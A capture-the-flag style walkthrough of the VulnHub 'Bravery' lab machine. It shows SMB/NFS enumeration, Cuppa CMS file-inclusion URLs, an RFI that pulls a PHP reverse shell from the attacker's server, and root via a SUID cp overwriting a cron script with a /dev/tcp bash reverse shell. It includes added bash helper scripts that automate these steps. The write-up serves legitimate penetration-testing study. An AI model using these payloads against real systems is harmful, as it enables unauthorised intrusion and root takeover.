Bravery — Walkthrough

Rafael Medeiros
9 min read · Apr 8, 2021

This is the seventh post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.

URL: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Release date: 28 Dec 2018

Author: Donavan

Provided description: This machine hopes to inspire BRAVERY in you; this machine may surprise you from the outside. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived, and made more nefarious than the original.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Bravery is (#1): a positive trait in people, (#2): another way of saying “try harder”, (#3): https://www.youtube.com/watch?v=k2QPJ2xGMiY

Note: There may be more than one method to obtain root privileges on this machine. Look around you!

At the time of this writing, this is the second VM on the NetSecFocus list.

Vulnerabilities Found:

Remote File Inclusion

Local File Inclusion

Sensitive File Disclosure

Privilege Escalation

#Scanning and Enumeration

Nmap

The Nmap scan shows that we have a long path ahead. Beyond the two web servers, the ports worth noting are:

  • 445 — SMB
  • 2049 — NFS
  • 3306 — MySQL

nmap -T4 <ipaddress>

Gobuster

Enumerating the directories revealed a run of numbered pages, most of them useless:

gobuster dir -u http://<ipaddress> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php

After going through all of them I found a hint on page “8”:

The scan on port 8080 revealed more pages:

gobuster dir -u http://<ipaddress>:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php

On the public page we get a company web page, but nothing interesting:

On the private page, well, it's private:

Enum4Linux

Because SMB (445) is open, we have to enumerate it as well:

enum4linux -a <ipaddress>

With all the results, the interesting parts are here:

We got an anonymous share. Could we connect to it anonymously?

The secured one is requesting a user and password, so, it’s not interesting right now.

We also have some local users:

david, ossec, ossecm, and rick.

Let’s connect to the anonymous share, shall we?

We can do that using smbclient, escaping the backslashes (press Enter at the password prompt, or add -N to skip it):

smbclient \\\\<ipaddress>\\anonymous

I went through all those folders before realizing that this was a rabbit hole, so there is no relevant information here that could help us.

Ok, time to go ahead. There is one more port that we haven’t tried yet.

Because we saw an NFS port open and running, it’s time to enumerate it. Running the following command reveals some interesting things to investigate further:

showmount -e <ipaddress>

Where -e lists the exports that the server offers.

To mount this export, we can use the following commands:

#Creates a folder in /tmp called mount

mkdir /tmp/mount

#Mounts the /var/nfsshare to our recently created /tmp/mount folder

sudo mount <victimIP>:/var/nfsshare /tmp/mount

Navigate to the folder we’ve just created and we will get the following:

After reading all the files and spending some time on it, I realized one thing that I highlighted with the red arrows:

Yes! We got a user and a password here. Take your notes:

david

qwertyuioplkjhgfdsazxcvbnm

Remember that we had a “secured” share that we didn’t have access to? What if we try the credentials above? Our scanning and enumeration phase is over, it’s time to get our hands dirty.

#Exploiting

Let's make another folder and mount the secured SMB share with david's username (mount will prompt for the password we found):

mkdir /tmp/secured

sudo mount //<victimIP>/secured /tmp/secured -o username=david

Where -o passes mount options, here the SMB username; mount treats a //host/share source as a CIFS (SMB) mount rather than NFS.

It worked:

Navigate to /tmp/secured and you’ll get the following 3 files:

The only thing that rang a bell for me was that URL pointed with the red arrow. We can try that on our browser:

It seems to be their corporate page, I quickly looked at the top ribbon that says “Internal Use Only”. Clicking on the second option led me to a CMS called Cuppa:

Searching on the internet, I found a File Inclusion exploit for this guy:

This is brilliant! We got 2 ways of exploiting it:

Trying the Local File Inclusion first shows that the vulnerability is real:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

The LFI works! Now let's read the CMS configuration file. A plain include would execute the PHP, so we wrap the path in php://filter to get the source back base64-encoded:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It is a long base64-encoded string. I usually use the following website to decode it:

https://gchq.github.io/CyberChef/

The same string also decodes locally with base64 -d. Either way, the decoded Configuration.php contains the database credentials, including the MySQL root password. We can keep that in our notes.

It isn't useful yet, so let's move on to the second payload.

The second payload is a Remote File Inclusion. All we have to do is trick the victim server into fetching a PHP reverse shell from a web server we control; because the included file is run by PHP, the shell executes on the victim.

A good source to get a php reverse shell is the pentest monkey one. I got that file and modified only the IP and the port I wanted the server to connect to:

Once you have that file ready, you have to serve it over HTTP so the victim can fetch it. Go to the file's folder and run:

python3 -m http.server

This module starts a simple HTTP server on port 8000 by default. Before forcing the victim to fetch the file, open a listener on the port you configured in the reverse shell; in my case I used port 53, which needs sudo because it is a privileged port:

sudo nc -lvnp 53

We are all set, let’s force the server to get our shell file:

http://<victimIP>/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.15.5:8000/php-rev.php

The page will keep loading, but the HTTP server's log shows the victim fetching the file:

And if you look at your listener:

We got a low-privileged shell!

We also got a message from the creator:
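The three inclusion payloads used above (traversal LFI, php://filter read of Configuration.php, and the RFI), plus the base64 decoding step, written out as a few shell helpers. This is an added example, not code from the post or from Cuppa CMS: TARGET and ATTACKER are placeholders taken from the URLs above, and the Configuration.php sample embedded in the script is constructed to mirror Cuppa's file format with a made-up password, not the file from the box.

```bash
#!/bin/bash
# Added example, not code from the post or from Cuppa CMS. TARGET and ATTACKER are
# placeholders; the alerts/alertConfigField.php path and the urlConfig parameter are the
# ones used in the walkthrough.
TARGET="${TARGET:-http://<victimIP>/genevieve/cuppaCMS}"
ATTACKER="${ATTACKER:-http://192.168.15.5:8000}"
INCLUDE="alerts/alertConfigField.php?urlConfig="

# LFI: traverse up to / and read an absolute path (e.g. /etc/passwd)
lfi_url() { printf '%s/%s../../../../../../../../..%s\n' "$TARGET" "$INCLUDE" "$1"; }

# LFI via php://filter: the file is base64-encoded before inclusion, so PHP source
# such as Configuration.php comes back as text instead of being executed
filter_url() { printf '%s/%sphp://filter/convert.base64-encode/resource=%s\n' "$TARGET" "$INCLUDE" "$1"; }

# RFI: include a PHP file served from our own web server
rfi_url() { printf '%s/%s%s/%s\n' "$TARGET" "$INCLUDE" "$ATTACKER" "$1"; }

# Decode a php://filter response on stdin and print the DB settings from Cuppa's
# Configuration.php as name=value lines
extract_db_creds() {
    base64 -d \
      | grep -E 'public \$(host|db|user|password) *=' \
      | sed -E 's/^[[:space:]]*public \$([a-z]+) *= *"([^"]*)".*/\1=\2/'
}

# Real run against the target (needs network; not exercised offline)
fetch_db_creds() { curl -s "$(filter_url ../Configuration.php)" | extract_db_creds; }

# Constructed stand-in for the server's response: base64 of a Configuration.php written
# in Cuppa's format with a made-up password; the box's real file is not reproduced here
SAMPLE_CONFIG='<?php
class Configuration{
    public $host = "localhost";
    public $db = "cuppa";
    public $user = "root";
    public $password = "ChangeMe";
    public $table_prefix = "cu_";
}'
sample_response() { printf '%s' "$SAMPLE_CONFIG" | base64; }

# ./cuppa_fi.sh demo  prints the three URLs and decodes the constructed sample
if [ "${1:-}" = "demo" ]; then
    lfi_url /etc/passwd
    filter_url ../Configuration.php
    rfi_url php-rev.php
    sample_response | extract_db_creds
fi
```

The php://filter wrapper is the important trick: without it, including Configuration.php just runs the PHP and shows nothing, whereas convert.base64-encode turns the source into inert text that the page echoes back, which is why the decoding step is needed at all.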

#Escalating Privileges

Ok, the first thing I thought when I got this shell was to connect to MySQL and see if we could find any user credentials there. Because Configuration.php gave us the MySQL root password, let's connect as root:

mysql -u root -p

#We show the databases with:

show databases;

#Select the bravery one:

use bravery;

The one we are looking for is something related with users.

#We show the tables using:

show tables;

And if we select all the results from that users table, we have all the users’ passwords:

I immediately ran to the Crackstation website since they are all MD5 hashes. But only 3 of them worked:

We know that there are no genevieve, govindasamy or roland users on that server, so in the end it was useless. If you know a way to use these credentials to escalate privileges, leave us a comment at the end of this post!

I decided to move on and try other things. I ran the LinEnum.sh script to see if I could find anything useful. Looking at the script output for some time revealed 2 things:

It is running a cron daemon, but for what?

A binary with the SUID bit set: /usr/bin/cp. A SUID binary runs with its owner's privileges (root here), so this cp can write to files we otherwise cannot. Could we use it to overwrite a root-owned file?

I then walked around to find any file that could be possibly running with the cron, and then I found this suspicious file on /var/www:

It looks like a script that could be executed by a cron job, doesn't it? If cron runs it as root, we can use the SUID cp to overwrite it with a reverse shell and get a root shell!

I found this useful website that contains some reverse shells we can use here. I picked the second bash reverse shell and echoed it to a file called maintenance.sh (replace ATTACKING-IP with your own address):

echo "0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196" > /tmp/maintenance.sh

All we need to do now is overwrite the file using the SUID cp:

cd /tmp

/usr/bin/cp maintenance.sh /var/www/maintenance.sh

All good now, the file has been overwritten:

Set up a listener on the port you put in the payload (80 here, so nc again needs sudo) and go grab yourself a coffee; our root shell is coming:

There it is! It took me at least 3 minutes to get the shell. You can find the proof file on /root directory. Congratulations!
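The checks behind the two LinEnum findings and the overwrite step, written out as one shell script. This is an added example, not code from the post or from LinEnum: /usr/bin/cp and /var/www/maintenance.sh are the paths from the walkthrough, while ATTACKER_IP and ATTACKER_PORT are placeholders you set yourself.

```bash
#!/bin/bash
# Added example, not code from the post or from LinEnum: the manual checks behind the two
# findings (SUID cp, cron) and the overwrite step. /usr/bin/cp and /var/www/maintenance.sh
# are the walkthrough's paths; ATTACKER_IP and ATTACKER_PORT are placeholders.

# Succeed when FILE has the setuid bit (mode 4xxx). -perm -4000 tests that bit alone,
# so a plain 755 file (or a missing path) fails the check
is_suid() { [ -n "$(find "$1" -maxdepth 0 -type f -perm -4000 2>/dev/null)" ]; }

# Every setuid file on local filesystems; /usr/bin/cp appearing here is the finding
list_suid() { find / -xdev -type f -perm -4000 2>/dev/null; }

# Places a cron job can be defined. /var/spool/cron/<user> is readable only by root,
# which is why the job itself only became visible after the escalation
cron_sources() {
    cat /etc/crontab 2>/dev/null
    ls -la /etc/cron.d /etc/cron.hourly /etc/cron.daily /var/spool/cron 2>/dev/null
}

# Write a bash reverse shell to OUTFILE. The shebang matters when the script is run
# directly, because /dev/tcp is a bash feature, not a POSIX sh one
write_payload() {  # write_payload ATTACKER_IP PORT OUTFILE
    printf '#!/bin/bash\n0<&196;exec 196<>/dev/tcp/%s/%s; sh <&196 >&196 2>&196\n' "$1" "$2" > "$3"
}

# Overwrite the cron-run script with the setuid cp. Overwriting keeps the destination's
# owner (root) and mode, so cron sees the same file with our contents; a non-setuid cp
# would fail with "Permission denied" on the root-owned target
plant_payload() {  # plant_payload SRC DEST
    if ! is_suid /usr/bin/cp; then
        echo "/usr/bin/cp is not setuid; cannot overwrite $2" >&2
        return 1
    fi
    /usr/bin/cp "$1" "$2"
}

# Run the whole chain only when asked: ./privesc.sh run  (listener: sudo nc -lvnp 80)
if [ "${1:-}" = "run" ]; then
    list_suid
    cron_sources
    write_payload "${ATTACKER_IP:?set ATTACKER_IP}" "${ATTACKER_PORT:-80}" /tmp/maintenance.sh
    plant_payload /tmp/maintenance.sh /var/www/maintenance.sh
fi
```

Without an argument the script only defines the functions, so from the low-privileged shell you can source it and call list_suid or cron_sources on their own first; plant_payload refuses to run unless cp really is setuid, which is the one condition the whole escalation depends on.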

#Bonus

I was curious to see how that cron job was set, so I found this Stack Overflow Q&A listing the different locations where a cron job can be defined. I went to /var/spool/cron and here's what I found:

The job was defined in root's per-user crontab (/var/spool/cron/root) and ran every 5 minutes. Cool!

#Conclusion

I spent more time on this machine due to a lot of rabbit holes that I thought were the correct path to progress. But it was good to learn that there are times we have to give up and try to find another way to keep progressing. I've learned more about NFS and SMB, how to exploit them, and how to use the command line tools to navigate through them. If you have any questions, please ask in the comments, and I will try my best to help you.

I see you in the next post. Happy Hacking!
